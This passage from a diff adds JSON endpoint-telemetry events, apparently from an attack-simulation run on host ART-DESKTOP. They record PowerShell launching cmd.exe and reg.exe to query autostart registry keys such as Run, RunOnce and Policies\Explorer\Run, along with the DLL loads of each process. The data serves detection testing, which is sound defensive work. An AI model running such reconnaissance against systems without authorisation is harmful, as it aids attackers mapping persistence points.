"image_load", + "image_name": "msvcrt.dll", + "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "process", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "process", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "command_line": 
"\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6396, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314320000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1060, + "ppid": 6396, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314410000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + 
"timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314330000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "process", + "pid": 1060, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" + }, + { + "event_type": "process", + "pid": 6396, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2912, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314599984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", 
+ "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314490000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6956, + "ppid": 2912, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314690000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "process", + "pid": 6956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 
131883571314650000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" + }, + { + "event_type": "process", + "pid": 2912, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2788, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314870000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": 
"image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5668, + "ppid": 2788, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5668, + 
"process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314960000, + 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "process", + "pid": 5668, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" + }, + { + "event_type": "process", + "pid": 2788, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571314960000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3496, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571315119984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2152, + "ppid": 3496, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571315220000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": 
"C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315110000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "process", + "pid": 2152, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" + }, + { + "event_type": "process", + "pid": 3496, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571315270000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4548, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571315880000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4548, + "process_name": 
"cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4548, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571315890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ABCF5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4548, + 